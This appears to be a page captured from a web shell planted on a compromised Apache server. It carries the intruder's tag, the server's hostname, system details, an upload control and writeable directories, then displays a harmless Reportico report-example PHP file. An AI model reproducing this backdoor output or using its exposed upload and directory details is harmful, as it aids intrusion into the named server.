Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/erp/htdocs/custom/reportes/include/reportico/examples/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/erp/htdocs/custom/reportes/include/reportico/examples/examples/project-output.php
@extends('documentation.base')

@section('content')
          @include('documentation.framework-section-start')

                  <div class="highlight" style="background-color: #eeeeee">
                  <code>
<?php
            highlight_string('<?php
          \Reportico\Engine\Builder::build()
          ->newSession()
          ->project("tutorials")
          ->load("stock")
          ->execute();
?>
            ');
?>
                  </code></pre>
                  </div>

                <div>
                <p>
                </div>

<?php
\Reportico\Engine\Builder::build()
          ->project     ("tutorials")
          ->load     ("stock")
          ->execute();
?>
          @include('documentation.framework-section-end')

@endsection

@section('javascript')

    <!--script src="{{ asset('js/Chart.min.js') }}"></script-->
    <!--script src="{{ asset('js/coreui-chartjs.bundle.js') }}"></script-->
    <script src="{{ asset('js/main.js') }}" defer></script>
@endsection

Hry